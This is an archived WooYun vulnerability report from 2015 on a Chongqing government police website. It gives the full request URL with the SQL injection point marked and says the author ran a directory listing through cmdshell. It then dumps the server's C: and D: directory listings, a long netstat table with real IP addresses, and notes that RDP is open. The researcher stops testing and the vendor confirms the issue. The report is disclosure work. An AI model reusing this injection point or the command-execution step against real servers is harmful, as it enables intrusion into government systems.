当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115128

漏洞标题:重庆市某政府站SQL注入有服务器沦陷风险【可执行命令】

相关厂商:重庆市

漏洞作者: 雅柏菲卡

提交时间:2015-05-20 14:42

修复时间:2015-07-05 22:34

公开时间:2015-07-05 22:34

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开

简要描述:

................................

详细说明:

......................

漏洞证明:

http://www.cqga.gov.cn/gajpublicinfo/frontui/ApplyQuery.aspx?__VIEWSTATE=%2FwEPDwULLTE5NjY3ODQwNTEPZBYCZg9kFgICAw9kFgICAQ9kFgICBQ8WAh4HVmlzaWJsZWhkZOk74f1CxlNkSO3o0DQjem4iN52A&ctl00$ContentPlaceHolder1$btnQuery=%E6%9F%A5%20%20%20%20%E8%AF%A2&__EVENTVALIDATION=%2FwEWAwLDo%2Fz8AwKWrZSNBQL32PXeDK7NjhaxCeLWKcNcbPmdFKhJfKhN&ctl00$ContentPlaceHolder1$txtQueryCode=111*
*号处为注入点

QQ截图20150516101508.jpg


QQ截图20150520105713.jpg


通过cmdshell 执行了 dir c:\
驱动器 C 中的卷是 sys
c:\ 的目录
2015-05-13 23:53 224,500 360ld
2015-05-13 23:53 <DIR> 360rescue
2015-05-13 23:53 <DIR> 360SysRt
2007-11-16 14:50 <DIR> ADFS
2012-07-09 22:40 365 AppScanSQLTest.txt
2007-11-16 11:53 0 AUTOEXEC.BAT
2009-01-21 20:18 13,281 bsmain_runtime.log
2007-11-16 11:53 0 CONFIG.SYS
2013-09-13 16:57 <DIR> Documents and Settings
2013-09-22 15:51 <DIR> Downloads
2009-09-15 15:46 819 ftnstat.stat
2007-11-16 13:04 <DIR> Inetpub
2009-03-29 23:38 843 nagent_log.txt
2010-02-24 15:02 <DIR> PrintTemplate
2015-05-16 15:14 <DIR> Program Files
2014-12-09 10:15 <DIR> SafeDogDownloads
2015-04-27 09:45 <DIR> Temp
2015-05-20 10:38 <DIR> WINDOWS
2007-11-16 11:53 <DIR> wmpub
7 个文件 239,808 字节
12 个目录 6,547,349,504 可用字节
列出了c盘的数据
驱动器 D 中的卷是 data
d:\ 的目录
2014-02-17 10:28 <DIR> 1fd398a8d57cdf2129ddafd19d13e540
2015-02-02 16:47 <DIR> 360Downloads
2014-11-14 11:12 <DIR> 535da8cb6b538ae5b50a510e
2014-06-28 15:18 <DIR> 55ed927812000235f2452c877d52
2013-07-10 21:20 <DIR> 8c5515aad3183fd3221d599b37
2013-11-15 10:14 <DIR> 985099114ebc57a046
2007-12-10 19:24 <DIR> app
2008-02-22 13:43 <DIR> aspnet_client
2010-07-24 02:01 <DIR> bak
2014-11-12 16:00 <DIR> d4127cb9c7147acfde6873117f
2015-01-29 10:22 <DIR> ec47f09c6b1b30918c6cb7fbb3
2015-02-12 12:12 <DIR> ee8ff1087fa40918008aa7674926ef
2008-02-19 13:42 664,576 iewebcontrols.msi
2010-01-20 14:07 <DIR> iis_config
2007-11-16 13:50 <DIR> IPMSG
2011-02-25 13:47 <DIR> RDP
2008-02-22 13:43 <DIR> webctrl_client
1 个文件 664,576 字节
16 个目录 27,492,904,960 可用字节
部分端口开放表
Proto Local Address Foreign Address State
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1094 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1311 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1362 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 10.1.1.2:3020 10.1.1.2:1433 SYN_SENT
TCP 127.0.0.1:389 127.0.0.1:2742 ESTABLISHED
TCP 127.0.0.1:1025 127.0.0.1:2879 ESTABLISHED
TCP 127.0.0.1:2742 127.0.0.1:389 ESTABLISHED
TCP 127.0.0.1:2879 127.0.0.1:1025 ESTABLISHED
TCP 127.0.0.1:2980 127.0.0.1:445 TIME_WAIT
TCP 127.0.0.1:30523 0.0.0.0:0 LISTENING
TCP 219.153.1.195:1481 101.199.97.174:80 ESTABLISHED
TCP 219.153.1.195:1702 101.199.97.102:80 ESTABLISHED
TCP 219.153.1.195:2931 218.70.229.114:80 ESTABLISHED
TCP 219.153.1.195:3006 218.104.139.78:80 TIME_WAIT
TCP 219.153.1.196:139 0.0.0.0:0 LISTENING
TCP 219.153.1.196:3389 222.59.116.71:44978 ESTABLISHED
TCP 219.153.1.197:80 14.106.122.99:24079 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:42273 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:42305 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:42977 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43105 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43138 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43169 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43521 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43553 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43585 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43617 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43649 ESTABLISHED
TCP 219.153.1.197:80 14.106.129.158:43681 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6341 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6342 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6343 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6344 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6345 ESTABLISHED
TCP 219.153.1.197:80 14.119.62.99:6346 ESTABLISHED
TCP 219.153.1.197:80 27.13.131.237:35732 ESTABLISHED
TCP 219.153.1.197:80 27.13.131.237:35733 ESTABLISHED
TCP 219.153.1.197:80 27.13.131.237:35739 ESTABLISHED
TCP 219.153.1.197:80 60.211.237.98:3505 ESTABLISHED
TCP 219.153.1.197:80 60.211.237.98:3639 ESTABLISHED
TCP 219.153.1.197:80 106.92.244.22:23314 ESTABLISHED
TCP 219.153.1.197:80 106.120.173.135:58061 TIME_WAIT
TCP 219.153.1.197:80 106.120.173.135:62346 TIME_WAIT
TCP 219.153.1.197:80 106.120.173.135:62429 TIME_WAIT
TCP 219.153.1.197:80 106.120.185.219:4762 ESTABLISHED
TCP 219.153.1.197:80 111.85.13.188:22123 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2146 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2149 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2150 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2151 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2153 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2154 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2160 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2161 ESTABLISHED
TCP 219.153.1.197:80 113.95.3.52:2162 ESTABLISHED
TCP 219.153.1.197:80 119.254.86.243:2246 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:15754 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:38478 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:51941 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:53038 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:62623 TIME_WAIT
TCP 219.153.1.197:80 119.254.86.243:64940 TIME_WAIT
TCP 219.153.1.197:80 123.125.71.95:18612 TIME_WAIT
TCP 219.153.1.197:80 123.146.200.37:1552 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1972 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1973 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1974 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1975 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1976 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1977 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1978 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1980 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1981 ESTABLISHED
TCP 219.153.1.197:80 125.82.9.132:1982 ESTABLISHED
TCP 219.153.1.197:80 125.82.188.137:30012 ESTABLISHED
TCP 219.153.1.197:80 175.44.187.217:19002 LAST_ACK
TCP 219.153.1.197:80 175.44.187.217:19004 LAST_ACK
TCP 219.153.1.197:80 175.44.187.217:19039 ESTABLISHED
TCP 219.153.1.197:80 180.153.214.152:34586 TIME_WAIT
TCP 219.153.1.197:80 183.230.45.58:2592 ESTABLISHED
TCP 219.153.1.197:80 183.230.45.58:2593 ESTABLISHED
TCP 219.153.1.197:80 183.230.45.58:2595 ESTABLISHED
TCP 219.153.1.197:80 183.230.45.58:2596 ESTABLISHED
TCP 219.153.1.197:80 183.230.45.58:2597 ESTABLISHED
TCP 219.153.1.197:80 183.230.45.58:2598 ESTABLISHED
TCP 219.153.1.197:80 202.65.194.168:45665 ESTABLISHED
TCP 219.153.1.197:80 202.65.194.168:55260 ESTABLISHED
TCP 219.153.1.197:80 202.65.194.168:58486 ESTABLISHED
TCP 219.153.1.197:80 202.109.191.134:1076 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47071 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47073 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47074 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47075 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47076 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47077 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47078 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47079 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47111 ESTABLISHED
TCP 219.153.1.197:80 218.70.161.53:47119 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3843 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3844 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3845 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3846 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3847 ESTABLISHED
TCP 219.153.1.197:80 218.201.25.44:3848 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2922 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2923 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2926 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2927 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2928 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2929 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2930 ESTABLISHED
TCP 219.153.1.197:80 219.153.1.197:2949 ESTABLISHED
TCP 219.153.1.197:80 222.177.8.69:34254 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34263 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34266 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34454 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34481 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34525 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34594 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34715 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34745 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34759 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34761 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34762 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34763 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34764 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34765 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34766 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34767 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34769 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:34770 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35000 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35002 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35004 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35033 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35058 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35106 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35127 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35151 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35152 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35153 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35155 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35159 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35160 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35184 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35186 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35201 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35280 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35304 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35349 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35350 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35351 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35403 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35404 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35406 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35430 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35486 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35565 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35635 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35639 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35657 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35816 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35817 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35835 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35851 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35897 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35903 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:35925 ESTABLISHED
TCP 219.153.1.197:80 222.177.8.69:35949 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36000 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36002 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36005 ESTABLISHED
TCP 219.153.1.197:80 222.177.8.69:36007 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36024 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36027 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36033 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36080 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36082 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36117 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36118 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36119 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36120 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36121 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36128 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36183 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36184 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36185 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36186 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36214 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36283 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36291 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36319 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36338 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36365 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36384 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36587 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36648 ESTABLISHED
TCP 219.153.1.197:80 222.177.8.69:36762 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36765 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36774 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36776 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36797 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:36954 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37000 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37004 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37041 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37059 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37170 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37175 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37206 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37225 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37229 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37238 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37284 TIME_WAIT
TCP 219.153.1.197:80 222.177.8.69:37291 TIME_WAIT
219.153.1.196:3389 3389是开的

QQ截图20150520112323.jpg


不做继续测试 请通知其进行修复吧

修复方案:

....................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-21 22:32

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无